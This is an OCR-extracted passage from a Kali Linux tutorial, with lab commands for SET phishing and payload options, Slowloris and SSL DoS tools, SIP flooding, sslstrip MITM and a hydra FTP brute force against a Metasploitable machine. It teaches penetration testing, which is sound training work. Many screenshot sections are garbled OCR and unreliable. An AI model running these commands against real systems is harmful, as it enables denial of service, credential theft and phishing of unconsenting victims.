IWSO(I
_,.
81.101
I~ 188.1100
OI!llliR
ModuleT.-
I 0 Brow$Ci'
LIlQS
(43)
I ~mm.nd. Ridf1f )(r~
Module "-tutu
Icj <lolo
IPI'C
HI.ory
labo! ~rlpt""': This moduleWlHu2 a M4n-ln-

t U CI1romo I!xlon,Ior-, (8)
I I UOObug(&)
~ ( J ExplO1t1 (48)
~.~Itsrrom
eo«ull!d comm3l1d
The-Orowser attack to C!nSUIO tMt
U'le DeEr hook will uy ullli! U'le
user IeIWe5 U'Ie domall' (manually
modlllc$ Wit be Ii.'ltrod changing It in U'Ie URl bar)
I I "l Hoa1(15) hml.
~IP[lC(8)
DN8 El'lumoro~on
DOSal
0010Cl $oetol NolWOlQ
OoloaTor
IRO NAT PInning
PIIlIl Swoop
Pori scannor
Flng<lrpnn\ Nolwatk
• 1'1119 Swoop (JOVlI)
I> I J Porslltonco (4)
! L J Phonogap (15)
t r;,;:)Sociol Englnoorlng (10)
Execute I
68
Kali Linux
Linux Exploit Suggester

It suggests possible exploits given the release version ‘uname -r’ of the Linux Operating
System.
To run it, type the following command:
root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k
3.0.0
3.0.0 is the kernel version of Linux OS that we want to exploit.
69
7. Kali Linux ─ Forensics Tools Kali Linux
In this chapter, we will learn about the forensics tools available in Kali Linux.
p0f
p0f is a tool that can identify the operating system of a target host simply by examining
captured packets even when the device in question is behind a packet firewall. P0f does
not generate any additional network traffic, direct or indirect; no name lookups; no
mysterious probes; no ARIN queries; nothing. In the hands of advanced users, P0f can
detect firewall presence, NAT use, and existence of load balancers.
Type “p0f – h” in the terminal to see how to use it and you will get the following results.
IpOf: Invalid option -- 'h'

Jsage: pOf [ ...options ... 1 [ 'filter rule' 1
etwor k iinterface options:

-1 lface listen on the specIfIed network interface
-r f He read offlIne pcap data from a glven flle
-p put the llstenlng lnterface In promlscuouS mode
-L llst all avallable Interfaces
perating mode and output settIngs:
-f file read fingerprint database from 'fIle' (pOf.fp)
-0 fHe wrIte Information to the specIfIed log fIle
-s name answer to API que ri es at a named un i x socket
-u user sWItch to the specIfied unprivileged account and chroot
-d fork Into background (reqUIres -0 or -5)
70
Kali Linux
It will list even the available interfaces.
.. Available Interfaces ..
0: Name : eth0
Description : -
IP address : 192.168.1.
1: Name nflog
Desc ript i on Llnux netfilter log (NFLOG) Interface
IP address (none)
2: Name any
Desc r i pt i on Pseudo· devIce that captures on all Interfaces
IP address (none)
3: Name 10
Descnptlon
IP address 127.0.0.1
Then, type the following command: “p0f –i eth0 –p -o filename”.
Where the parameter "-i" is the interface name as shown above. "-p" means it is in
promiscuous mode. "-o" means the output will be saved in a file.
:-# pOf -1 ethO .p ·0 /root/Desktop/my.log
Open a webpage with the address 192.168.1.2
hup·/119U64.1 'lJ • +
19116&11
M..,V",,"y 601l_5« ... y 'KII,llno> 'I(IUO." 'KIliT_ DlqrI"'OI
It worksl
TIu. II the default web page ror thll server,
The web server sortware IS runrung but no content hag been added. yet.
From the results, you can observe that the Webserver is using apache 2.x and the OS is
Debian.
pdf-parser
pdf-parser is a tool that parses a PDF document to identify the fundamental elements used
in the analyzed pdf file. It will not render a PDF document. It is not recommended for text
book case for PDF parsers, however it gets the job done. Generally, this is used for pdf
files that you suspect has a script embedded in it.
71
Kali Linux
The command is:
pdf-parser -o 10 filepath
where "-o" is the number of objects.
As you can see in the following screenshot, the pdf file opens a CMD command.
IF (c.,d.8ie)
ID . (e :\\\\\vindows\\\\syst"m32)'
IP (
/0 . Ie ·,HOI1EDRIVE%&cd %HOI'IEPATH%&( If "'lst "Doc.f.101. '''~I l ,u· I J" '. J'
"DI?~~htop"))&(lf ox i s t "My Do(um0nts\\\\tl'?rnpl(1t~.pdt·· (('.1 "My ':)(Ulfl,?n~'_~" t, l!' ,~.,
:.:i,,;t "[)oClIl11pnts\ \ \ vr ompt at ... .pdf " {( d "flocumc.nt ~~":, :' (1 (1 f c. ·lc.~t -« r 1 t o: 1.:,' r ':.mr_,
lat0.pdf" (cd "Es c rl.t o ri o vj j St i r 0xist "f-lls (iO(Umf::'ntos t'~f"1r c-lt·,_ r'Jf' <) "r·11~-.
[)ocul11,:,nlo,_."))&(stdrt t0mpldtp.pdf)\/)\n\,n"',I1\n"n n,n II n l o ,'10,_, the. ,:-.rH ~ i,t':'j ,--,~-,
r ont plcJ(ls0 t t c k th0 "Do not sho'w' this m(:,:,s,aq0 ,.1q-:'11"I'· bo· ":Ir-"j ~f'~'C'S _I["~'
c->
Dumpzilla
Dumpzilla application is developed in Python 3.x and has as a purpose to extract all
forensic interesting information of Firefox, Iceweasel, and Seamonkey browsers to be
analyzed.
ddrescue
It copies data from one file or block device (hard disc, cdrom, etc.) to another, trying to
rescue the good parts first in case of read errors.
The basic operation of ddrescue is fully automatic. That is, you don't have to wait for an
error, stop the program, restart it from a new position, etc.
If you use the mapfile feature of ddrescue, the data is rescued very efficiently (only the
needed blocks are read). Also, you can interrupt the rescue at any time and resume it
later at the same point. The mapfile is an essential part of ddrescue's effectiveness. Use
it unless you know what you are doing.
The command line is :
dd_rescue infilepath outfilepath
Parameter "–v" means verbose. "/dev/sdb" is the folder to be rescued. The img file is
the recovered image.
72
Kali Linux
DFF
It is another forensic tool used to recover the files. It has a GUI too. To open it, type “dff-
gui” in the terminal and the following web GUI will open.
Digital Fort!nsics Framework
Fite Edit Modute View IDE
, Open evidence ~ Open device Browser IJII Consote IIpI Uve scripting .. IDE
Browser
/ Tags v ~ Search _/_ Fitter
Name name size tags path Attribute

a Local devices name
, Logical files ~ local devices o node type
~ Modules root
, logical files o generated by
~ Modules root o
Bookmarks size
v attributes
"" type
magiC
magic mime
I) I
Task Manager I "Output • Errors .... Modules
EZ!Preview
73
Kali Linux
Click File -> “Open Evidence”.

ra<'"
:!l -_.t'" .......

.........
"-
..... ,,-
tOl 1
• Cd.dt • ..,...tcr¢n:;
"... /I.
J
.. I ....
I:) boo
.. .. ,.,.. .17" .. / .....
......
...... '-
...
.~
t_
"V' 11- 14
• 0 !ll"'~-'. .... ..
8<
• L"",tln.}
.. ~ .,. Modt.Aa root
DC
o
Loc.. df'A(,.
looa,ulhIH
0
0
I
I
-t)1>t
~tttdby
"oh,,"'.- o 4f "" 0
Modul,}tMl 0 I
'-" ..,..
""9"
magi( "'.,'"
"
.,
__.... _ - u............. , J
(
&- .::a .. ~
• (
/I.
•
The following table will open. Check “Raw format” and click “+” to select the folder that
you want to recover.
I'-_-I__ twP -
__ ""__ - _
74
Kali Linux
Then, you can browse the files on the left of the pane to see what has been recovered.
-
......__..._ e·._ .. ._ ....._ .
-
-......_ . .........- .-
..
•
.. •
"ttl'
'Ot...ot
"-'
•
.
-_ .. - _. ~
- ,_,
. --
" __ ~ .._"..t_..._,...--.._
,_
-~.........
__Jot...... ........."_ ._ _.. -:::~::: .......
-....,... -..
.. __
,.... .. _._ ...._......__ ....
,...".."
.....-_
..... ,.,,-
·· ..--- -..,..........
•• .......... 1
---"..... _ -
_.~..... .... ....JII_ -...,._ •
._
.••• c~"'I'i~~-~-~ ~ ....,..

..... ..
._ ..._ _ _ _ ...
"- _.-
._
....""
· .....
. -_.
..
••
••
,.t ......
.,--=..~ ::".
_."...
-".".
-
:::::=:....:::::
..,. _. -~ -
-.......-.. -~.-..,-
.__..,....... :::::j
.......-.."
.~."
......
..~- ...."._._
~.ut"1 ~ ".... _ _ •• ..__,..,.,_
~ .._.',.... .."! "

..1IiII_ ",.._ • _ .._ <:1_
~----~-----------n----------cc------, .1•
75
8. Kali Linux ─ Social Engineering Kali Linux
In this chapter, we will learn about the social engineering tools used in Kali Linux.
Social Engineering Toolkit Usage

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework
designed for social engineering. SET has a number of custom attack vectors that allow you
to make a believable attack in a fraction of time. These kind of tools use human behaviors
to trick them to the attack vectors.
Let’s learn how to use the Social Engineer Toolkit.
Step 1: To open SET, go to Applications -> Social Engineering Tools -> Click “SET” Social
Engineering Tool.
76
Kali Linux
Step 2: It will ask if you agree with the terms of usage. Type “y” as shown in the following
screenshot.
Terminal 090
Step 3: Most of the menus shown in the following screenshot are self-explained and
among them the most important is the number 1 “Social Engineering Attacks”.
Terminal 090
77
Kali Linux
Step 4: Type “1” -> Enter. A submenu will open. If you press the Enter button again,
you will see the explanations for each submenu.
The Spear-phishing module allows you to specially craft email messages and send them
to your targeted victims with attached FileFormatmalicious payloads. For example,
sending malicious PDF document which if the victim opens, it will compromise the system.
If you want to spoof your email address, be sure “Sendmail” is installed (apt-get install
sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options for the spear phishing attack:
 Perform a Mass Email Attack

 Create a FileFormat Payload and a Social-Engineering Template
The first one is letting SET do everything for you (option 1), the second one is to create
your own FileFormat payload and use it in your own attack.
Terminal 000
Type “99” to go back to the main menu and then type “2” to go to “The web attack
vectors”.
The web attack module is a unique way of utilizing multiple web-based attacks in order to
compromise the intended victim. This module is used by performing phishing attacks
against the victim if they click the link. There is a wide variety of attacks that can occur
once they click a link.
78
Kali Linux
Terminal 000
Type “99” to return to the main menu and then type “3”.
The infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit
payload. The payload and autorun file is burned or copied on a USB. When DVD/USB/CD
is inserted in the victim’s machine, it will trigger an autorun feature (if autorun is enabled)
and hopefully compromise the system. You can pick the attack vector you wish to use:
fileformat bugs or a straight executable.
Following are the options for Infectious Media Generator.
 File-Format Exploits
 Standard Metasploit Executable
Type “99” to go back to the main menu. Then, type “4” to go to “The web attack vectors”.
79
Kali Linux
The create payload and listener is a simple way to create a Metasploit payload. It will
export the exe file for you and generate a listener. You would need to convince the victim
to download the exe file and execute it to get the shell.
Type “99” to go back to the main menu and then type “5” to go to “The web attack
vectors”.
The mass mailer attack will allow you to send multiple emails to victims and customize the
messages. There are two options on the mass e-mailer; the first is to send an email to a
single email address. The second option allows you to import a list that has all recipient
emails and it will send your message to as many people as you want within that list.
 E-Mail Attack Single Email Address

 E-Mail Attack Mass Mailer
80
Kali Linux
Type “99” to go back to the main menu and then type “9” to go to “Powershell Attack
Vector”.
> 9
The Powershell Attack Vector module allows you to create PowerShell specific att
ac k s . These at t ack s will allow you to use PowerShell which is available by defau
I t in all operating systems Windo'ws Vista and above. PowerShell provides a f rui t
ful landscape for deploying payloads and performing functions that do not get
triggered by preventative technologies.
11 Po~ershell Alphanumeric Shellcode Injector

2\ PO'kershell Reverse Shell
31 PowerShell Bind Shell
41 Powershell Dump SAM Database
99) Return to Maln Menu
The Powershell Attack Vector module allows you to create PowerShell specific attacks.
These attacks allow you to use PowerShell, which is available by default in all operating
systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying
payloads and performing functions that do not get triggered by preventive technologies.
 Powershell Alphanumeric Shellcode Injector

 Powershell Reverse Shell
 Powershell Bind Shell
 Powershell Dump SAM Database
81
9. Kali Linux ─ Stressing Tools Kali Linux
Stressing tools are used to create DoS attacks or to create the stress test for different
applications so as take appropriate measures for the future.
All the Stress testing tools are found in Applications -> 02-Vulnerability Analysis -> Stress
testing.
All Stress testing test will be done on metsploitable machine which has IP of 192.168.1.102
sfadnln~netasploltable - Ifeonflg
tl.O LInk eneap Ethernet HWaddr 08 00 Z7 Dc e3 be
Inet .ddr 13Z I~R 1 10Z Beast 13Z lb8 1 Z55 Mask Z5S ZSS ZSS 0
Inetb addr fe80 .00 Z7ff feOe c3he/&1 Sen e LInk
Slowhttptest
Slowhttptest is one of the DoS attacking tools. It especially uses HTTP protocol to connect
with the server and to keep the resources busy such as CPU and RAM. Let’s see in detail
how to use it and explain its functions.
To open slowhttptest, first open the terminal and type “slowhttptest –parameters”.
82
Kali Linux
You can type “slowhttptest –h” to see all the paramenters that you need to use. In case
you receive an output, ‘Command not found’ you have to first type “apt-get install
slowhttptest”.
: --# apt -qet Lns t al I s'Lowhtt ptes t

Readinq packaqe Lists Done
BuiLdinq dependency tree
Readinq state information Done
The fOLLowi.nq NE"li packaqes 'Nil. L be instaL Led:
sl owht t p t s s t
G upqraded, 1 ne~"LY Lns t al l so , 0 to remove and 1759 not upqr adad .
Need to get 28.5 kB of archives.
Then after installation, again type slowhttptest –h
:--# sl owht tpt cs t -h
SLowhttpt8st, a tooL to t8St for SLow HTTP DoS vULnerabiLiti8s - version 1_6
Usaqe: sLowhttptest [options ... J
Test modes:
-H sLOW headers e .k a . Sl owl o ri s (default)
v
-8 SLow body a.k.a R-U-Dead-Yet

-R ranqe attack a.k.a Apache kiLLer
-x SLow r8ad a.k.a SLow Read
Reportlnq options:
-g qenerate statistics with socket state chanqes (off)

-0 fiLe_pr-efix save statistics output in fiLe_htmL and fiLe.csv (-q required
Type the following command:
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u

http://192.168.1.202/index.php -x 24 -p 2
Where,
 (-c 500) = 500 connections

 (-H) = Slowloris mode
 -g = Generate statistics
 -o outputfile = Output file name
 -i 10 = Use 10 seconds to wait for data
 -r 200 = 200 connections with -t GET = GET requests
 -u http://192.168.1.202/index.php = target URL
 -x 24 = maximum of length of 24 bytes
 -p 2 = 2-second timeout
83
Kali Linux
Once the test starts, the output will be as shown in the following screenshot, where you
can notice that the service is available.
After a while, at the 287 connection the service goes down. This means that the server
can handle a maximum of 287 HTTP connections.
Inviteflood
Inviteflood is a SIP/SDP INVITE message flooding over UDP/IP. It executes on a variety of
Linux distributions. It carries out DoS (Denial of Service) attacks against SIP devices by
sending multiple INVITE requests.
To open Inviteflood, first open the terminal and type “inviteflood –parameters”
For help, you can use “inviteflood –h”
84
Kali Linux
># invitefLood -h
invitefLood vo rst on 2.0

June 09, 2006
Usage:
~landatoI-Y
interface (e.g. eth0)
target user- (e.g. "" or j ohn doe or-5000 or "1+210·555-1212")
i
target domain (e.g. enterprlse.com or an IPv4 address)

IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional -
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S s roPo rt (0 - 65535) [default is weH-kno'wn discaro port 9]
-D destPort (0 - 65535) [default is well-known SIP port 5060]
-1 lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode
Next, you can use the following command:
inviteflood eth0 target_extension target_domain target_ip number_of_packets
Where,
 target_extension is 2000
 target_domain is 192.168.x.x
 target_ip is 192.168.x.x
 number_of_packets is 1
 -a is alias of SIP account
Iaxflood
Iaxflood is a VoIP DoS tool. To open it, type “iaxflood sourcename destinationname
numpackets” in the terminal.
To know how to use, type “iaxflood –h”
:-# Lax f l ood -h

usage: laxflood sourcename destlnationname numpackets
85
Kali Linux
thc-ssl-dos
THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL
connection requires 15x more processing power on the server than on the client. THC-
SSL-DOS exploits this asymmetric property by overloading the server and knocking it off
the Internet.
Following is the command:
thc-ssl-dos victimIP httpsport –accept
In this example, it will be –
thc-ssl-dos 192.168.1.1 443 –accept
Its output would be as follows:
rootOluallJ •
86
10. Kali Linux ─ Sniffing & Spoofing Kali Linux
The basic concept of sniffing tools is as simple as wiretapping and Kali Linux has some
popular tools for this purpose. In this chapter, we will learn about the sniffing and spoofing
tools available in Kali.
Burpsuite
Burpsuite can be used as a sniffing tool between your browser and the webservers to find
the parameters that the web application uses.
To open Burpsuite, go to Applications -> Web Application Analysis -> burpsuite.
To make the setup of sniffing, we configure burpsuite to behave as a proxy. To do this, go

to Options as shown in the following screenshot. Check the box as shown.
In this case, the proxy IP will be 127.0.0.1 with port 8080.
87
Kali Linux
Burp 50th! frff Edilion 111.6.31 oao
..I. 9w'p
,
Pro.f!tusn
. ,
t..ueners to rec..e;.Ve1"'Amlln; HTI'P ft'quut from yc..I bro•• er You wJI Md to t4n1.... e )'OUr broMwr ta \1M one d the U.unen .5 ItJ fKO:ly
It!,....r
l!!t1.ibl. !!.taroq qgift;1I!~

U Ft.r'f't"Olit
f.tk
I.,
f"I ..
un .. 0_
,.nM.lon err &ud 4''''''.'''
t6elt 01••• IN<
1lJ.0"" (A. U"1i~.lit Ih"l DrollY
... ,.llano. oJ B"~
""tln~'...U~ u•• ~" ".~."O $Sl. CO"".ctjon, YOIIc.n I"..., Cit .,-pol1lh., C,.,lnflltle
, , •r I I I ~rtf! ~It !I'
f!:!J ,,11('" .hl," ,oquuu

ve. Ill...... Itft9. ~ ... Wlr..4 tor .... '.0 ..... odltJ.Q,n tho ,~.pt tAlo
foil "'""tIC ,._nl t>at.d o••h.lof4w"'f """
IIcI.bo...wp , e •• dm ••
D _ """ch I·U~II·""" ·PR41t·ullI·,.11
, _---_'-- J
Then configure the browser proxy which is the IP of burpsuite machine and the port.
Connection Settings r---
Configure Proxies to Access the Internet

" lEI
No proxx
Auto-detect proxy settings for this ne~ork
1!se system proxy settings
'~, ~anual proxy configuration:
HTTPProl!.Y: 127.0.0.1 fort:

r 8080 1:1
S
_ U!e this proxy server for all protocols
SS!, Proxy: I PQrt: I o [AI

ETP Proxy: I Port: r ~AI
SOhKS Host I POr!: r o IAI
c SOC~S v4 0S0CKSyS o Remote QNS
No Proxy for:
Ilocalhost, 127.0.0.1
I
Example: .mozilla.org, .netnz. 192.168.1.0/24
(; ~utomatic proxy configuration URL:
--
_II R~load
I
o Do not prompt for authentication if password is saved
~ Help ~el III OK II~

88
Kali Linux
To start interception, go to Proxy -> Intercept -> click “Intercept is on”.
Continue to navigate on the webpage that you want to find the parameter to test for
vulnerabilities.
ITlIf'f~~ 11$0111,( 'k·~II~ ~1Ii:ft- ,~e",.,. I~ I c-.rtT-1 ~tT o,,~ Alt'1U I

IJw.an$t Hrlfl bltory wdl-1:o6.:tb hmory OIltlO"",
riflt...-u ~•• "

:0 liJ ~
II"", 'M~' Ii.'"'''' "°1
In this case, it is metasploitable machine with IP 192.168.1.102

II
Damn __ WmApp (!:MIlA) -Logln-lcewusel OEH
ICaiJ Unt,llt. an Off."w. s- " O;t.wt ~ w.b A.. • •
f. .J' ~ 192.168.1.102,.'_~
--
_.
Go to “HTTP History”. In the following screenshot, the line marked in red arrow shows the
last request. In Raw and the hidden parameter such as the Session ID and other parameter
such as user name and password has been underlined in red.
89
Kali Linux
.
, "-
~1Qo-;;iiil,. 110-'--
" ..",.et
eET
U'IL IP ... .,..&
J
e;.t.,.,119"1 ,1'11(: . --=-!.
,,"'LMI(.
..,
toI.lA~dir.2 ~
1UqJ+llltl,li'l.l'l
IIttPHlI2-1il.1.101
GET
GET /f .....r:c.ni(.
J
U
'0<
40<
4,.
"0
HlM.
HI....
"'.
lco
'&Ga 14.'l Feurlii
",. HotFtu!'lCl
•, iTttpJil'l.l'lll'l "rr _oj a "'"TH....I.. ..,.
J..
III!»:lIl.:ll$, l )'Z
J..,p)Jl1" ••
~tt
'Off
""~"hp
~_~fl"" U
Ii)
utt
"fI" .... 0.....11 ~t.tt ..Wt
11)"
;)QST ' ......... "aq''''.'h.
It:. 1,,;0,1 102
Hl"'W/1.1
I 'trnl\./~IO Hilli Unu, •• _64 0' (i«Jlo/)Ol.OOlO1'l1,(.fqc,,"'.O 1(;t"W!uc\'.' 0."

JI<:--~
4(;cep1 te)'t Ih1.l .ppl lut1.,"hl'<t.\ .,.. 1• .-.9' "1"
1<111.01\/)1\.4-'0_' .• / • ..,0.'
.t.£(,,.!.LWlQII'.o".
4CC"Jlt·Ent-Ddt ....
___fltte.r htHITJJl.J2.H.
eft
,zh ... fl."
lJS,ctI it'"D.S
\ lOVIlli"""Il.,ll't ""'"
:Oot-le t;cc.uf1.tY.. "IlghI P-~.e5oU3"7.a.LcfC'e.(.tU.&bi'3·~~fi11
tetll'l.C11M: ,lOA
:.011,,,,,,1- T,.... ...,t it.'~ •._., Of-I -Ii' \ .ht-lId.CI
.."",frtt-UItO'H, ~,
mitmproxy
mitmproxy is an SSL-capable man-in-the-middle HTTP proxy. It provides a console
interface that allows traffic flows to be inspected and edited on the fly.
To open it, go to the terminal and type “mitmproxy -parameter” and for getting help
on commands, type “mitmproxy –h”.
root@kall: N
OGO
90
Kali Linux
To start the mitmproxy, type “mitmproxy –p portnumber”. In this case, it is “mitmproxy

–p 80”.
: --# mltmproxy -p 80
:-# I
// /. ''///'''/N'' Y/P///////#/-'/'l.'/,@@#//...@W~ 0 0. ,Q'$////~//"':;-/' ,
Wireshark
Wireshark is one of the best data packet analyzers. It analyzes deeply the packets in frame
level. You can get more information on Wireshark from their official webpage:
https://www.wireshark.org/. In Kali, it is found using the following path - Applications ->
Sniffing & Spoofing -> wireshark.
91
Kali Linux
Once you click wireshark, the following GUI opens up.
Th~ Wiro'~rk Notwork Analyur [WIro.h.rk 1.12.6 (Glt Rov Unknown 'rom unknown)] • e 0
F,l. Edit V,.w Go Caplur. An~lyl. S"'I<"CS r,,[topnony Tools In •• mats H.lp
Filter:
• 1 ..
Expression. .. r it Appl,;, Save
_____fL__ The .World's Most Popular. Network Protocol Analyze

WI RES HARK Ve'r~lo~1 ii 6 (Cit R~v'Unk~~~nr,6ni u~knowni .
Capture Files
Interface List fj Open

Live lilt or the (ap' ure ,nltf"'i<et Open. previously uptUI cd nit'
(counts Incoming pa<kets)
Open Recent: ..
Start
ChOQ~1!:
ene er mere inlet'"ce$ 1.(1
t.aplU~ trOIT\.Ih~ Sbrt Sample Captures
A rich assol tm~:nlor eumple '''ptureN!S on the wll
.clclo
-------- ---------------
No Potl;~ FrClfil... Dd"."·1
Click “Start” and the packet capturing will start as shown in the following screenshot.
..
Ie
_
rlltf"r
_.- - .-..
®
•
--
1
-,...._- ...._.,-- --.--~.- ---_."
I ('\_ .. .. ~
..,
._-
:f:
"_xpress on
...__ .,,--
,
~
'-or
J I
l'!l
,
..::J ..,
, ,
"0. "me ::aoure@' Ue5l"lnd~IOn rrOI:OCOI L.en90 In, 0
79 29.2826430C( 192.168.1.232 192.1GB.1. 2SS UOP G3 Source pc

80 29.28~750(K 192.188.1.2<0 [$.2.168.1. 255 ucP 63 Source P"
81 29. 28620B8& 1.92.168.:J. zzo IG2.168.1.2SS UCP 63 Sourc-Q P"
83
-- - - -
30.1 0C9830C( SansungE
I - Captured packets-
Sa: bG: Be. Broadcast
~r
~RP
,
GO Who r:as " f'
]
, Fr~me t: GG byte-s on wa r e (48!!I bi ts), GO bytes captured (400 b,tsJ i rrrer-f ece 9
, Cthernet l1. Src: S.msvnoC.So:b6:6e 160:6b:bd:5a:Q6:601.Det: BrQ.d~st Iff:
"" fi :ff:·-f: If: f
, Addross ~Golution protOcl)l (rcquoct)
Packed Detail
ii f· H -i If H
00:>9
0019
0020
08 eo 05 04 sa
00 co 00 00 00
60. 6!J
01 60' 6"0
00 eo aa
bd Sa b5 6c 38 OS 00 01
bd So bs 6c :9 ~s 01 ds
01 at 03 CO 30 00 DC 03
:::::Padilit:s
..... . - . ..... .. -
in Binaries
0039 00 00 09 .00 ee 00 eo oa 00 ec 03 co ....... . ....
• ", Q.tnO: <live captul'C! in orogrQ'$.> Fit... P;acIo(e.ts: 33 Displ.ycd: 33 (. Profile O(!f;aLlt
92
Kali Linux
sslstrip
sslstrip is a MITM attack that forces a victim's browser to communicate in plain-text over
HTTP, and the proxies modifies the content from an HTTPS server. To do this, sslstrip is
"stripping" https:// URLs and turning them into http:// URLs.
To open it, go to Applications -> 09-Sniffing & Spoofing -> Spoofing and MITM -> sslstrip.
sslstrip 0.9 by Moxie Marlinspike

Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
,-p , --post Log only SSL POSTs. (default)
- 5 , - - ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from ser
r,
-1 <port>, --listen=<pol-t> Port to listen on (default 10000).
- f , - - f avicon Substitute a lock favicon on secure requests
-k , --killsessions Kill sessions in progress.
-h Print this help message.
:-# I
93
Kali Linux
To set it up, write to forward all the 80 port communication to 8080.

= _:' j,' " l' t, I~, j 1" " " :'. !.' _ l' l II r " c, " ': I' "I II'
= "
Then, start the sslstrip command for the port needed.

•
root®kaU: -
F,I@ Edit Vtaw S@lIr<h T ermlOal Help

: :: '; - - v. ~ , -; . .::-
94
11. Kali Linux ─ Password Cracking ToolsKali Linux
In this chapter, we will learn about the important password cracking tools used in
Kali Linux.
Hydra
Hydra is a login cracker that supports many protocols to attack ( Cisco AAA, Cisco auth,
Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET,
HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle
Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh,
SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY,
Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP).
To open it, go to Applications -> Password Attacks -> Online Attacks -> hydra.
95
Kali Linux
It will open the terminal console, as shown in the following screenshot.
Examples:
hydra -1 user -P passlist.txt ftp://192.168.0.1
hydroa -L use r'l i s t t x t -p defauLtpw imap://192.168.0.l!PLAHI
i
hydra -C defaults. txt -6 pop3s://[2001 :db8: :1] :143/TLS:DIGEST-MDS

hydra -1 admin -p password ftp://[192.168.0.0/24]/
hyd ra -L logins.txt -P pws.txt -r~ targets.txt ssh
:-#
In this case, we will brute force FTP service of metasploitable machine, which has IP
192.168.1.101
..
.u.o Lirl'. c uc op Ef.hc ruu t IfW,,,\d!" 00 Z7.0c:c'J.(,,, on
i uc t ",\d!":l'JL lGU.l.10l IJc"c.ll'JL.1GU.l.Lc,c, M"sk:LC,C,.LC,C,.LC,C,.O
i u e Lb a d d r- : feUO. :dOO.2"111 .leOc:c'JGe/G4 ;;cupe.Lirlk
We have created in Kali a word list with extension ‘lst’ in the path
usr\share\wordlist\metasploit.
,.....
<
(9
) ~ In'
...
wwd!1 ... m.ta,paoll
\ltu..ut ........ - vl!'C'IOOr_
r(IV_dw-..v. ..
Q.
Q H....,.
OtJldop
..
II ~
-
C; Do<um_ or.d._ oud._ p<."',"-
clef .. lt..
Cll'xt._
dtf ...lt.. d.,...... po.tglN'S_
clef .. 1t..
o I)w,t.Itwd ""' .... tJI, .....~ .... <pU .... ,
cIefoul ...
...... llOt "ser.... t
r: ",",oc
=>'II
1J Pch ........
A Vd..", po<1XJ .... _ root.. routt-rs._ fPC-NmH. "'rvI(-'- up.. ."!'_.fadL

ii r",,"~ d.f.oulL
~~ott
userpau ..txt uurpu.s..l1lt txt
..,
From.....wICft. common...ott txt
+ Oi~ Loc.tiQrt,
.........,,_
P"Mon
sud&..
d.flUl ...
.I!m<tt",,-
m-tx,
umitiYr_
".,.w-.,tyf
s.d. .. , _,''""1'- ... If'P""
-
US.'pHl tiU.
-
liE
tornc .....
Mg'-
• '''''It.....
== E!I
.........
""9r_
cIofaulw..
-.""',.....
=
"'gr.
.........
sa
UI!i>_
p,,,w~
tw.
unot ...~
tx. ~ ....,--tJ
-
==
'In<-
Ill'
~
The command will be as follows -
hydra -l /usr/share/wordlists/metasploit/user -P
/usr/share/wordlists/metasploit/ passwords ftp://192.168.1.101 –V
where –V is the username and password while trying

11 " , • t, " I ! j l' "~l . ! L j 11, "" 1: .. rlu'''. • '" • •• ..
, .
96
Kali Linux
As shown in the following screenshot, the username and password are found which are
msfadmin:msfadmin
Johnny
Johnny is a GUI for the John the Ripper password cracking tool. Generally, it is used for
weak passwords.
To open it, go to Applications -> Password Attacks -> johnny.
97
Kali Linux
In this case, we will get the password of Kali machine with the following command and a
file will be created on the desktop.
Click “Open Passwd File” -> OK and all the files will be shown as in the following
screenshot.
File Attack Passwords
Open Passwd File rAn I • oo Start Attack
User Password Hash GECOS
1 root x O:O:root:/root/bm/bash
I-
2 daemon x l:l:daemon:/usrlsb,n:/bm/sh
Options
-
3 b,n x 2:2:b,n'/blO'lb<rVsh
.O~ 4 sys x 3:3:sys:/dev:/birllsn

Statistics l-
S sync x 4 :655 34 :sync'lb<n'/b,rVsync
/ 6 games 5:60:games'/usr/games/bin/sh
Settings 7 man • 6:12:man.lvar/cacne/man:/birVsn
..) 8 lp x 7: 7:lp:/varlspoolllpd'/birVsn
Output 9 mall x 8:8:rnatl:/Var/m"J'olrVsh
10 news x 9:9:news:lvar/spooVnews:/b'rVsh
11 uucp • 10: 10:uucp 1_/spool/uucp:/b'rVsn
12 proxy 13:13:proxy Ib<n:/b'rVsn
13 www ..data • )):)):www-d.t.,_lwww /bIn/sh
14 backup 34: 34:ba<kup Ivar/ba<kups IbIrVsh
15 lis! • 38:38:Ma'I,ng LISt Manager:/var/lisLlbmlSh
16 ire x 39:39:ircd 1_/runfired /bin/sh ~

OX
Click “Start Attack”.
Johnny
Open Passwd File Start Attack Copy
~ u__s_er
__ ~r-p_a_s_s_w_o_r_d H_._s_n G_E_C_O_S ;rl
37 postgres • 118:129:PostgreSQL adm,nistrator ... /varll,b/postgresqt /bin/bash U
After the attack is complete, click the left panel at “Passwords” and the password will be
unshaded.
98
Kali Linux
Johnny
Open Passwd File Start Attack Copy
Us!!r Password Hash GECOS
postgres x 118: 129: Postgre5QL administrator .... Ivar Illb/postgresql:/blnlbash
redsocks x 119: 130:'/var/run/redsock~lbi"/false
stunnel4 x 120: 13 1::/varfrun/stunneI4_Ibin/false
statd x 121:65534::fvar/llb/nfs:/bln/false
Statistics ssut x 122: 134::/nonexlstent-/bln/ralse
/ x 123:13S:Gnome Display Manager)varfLlb/gdm3:/blnlfalse
x 124: 116:RealtlmeKit ... )proc /bin/false
125: 137::/homelsaned.lbln/false
Output
r==-~=====-~-=~I
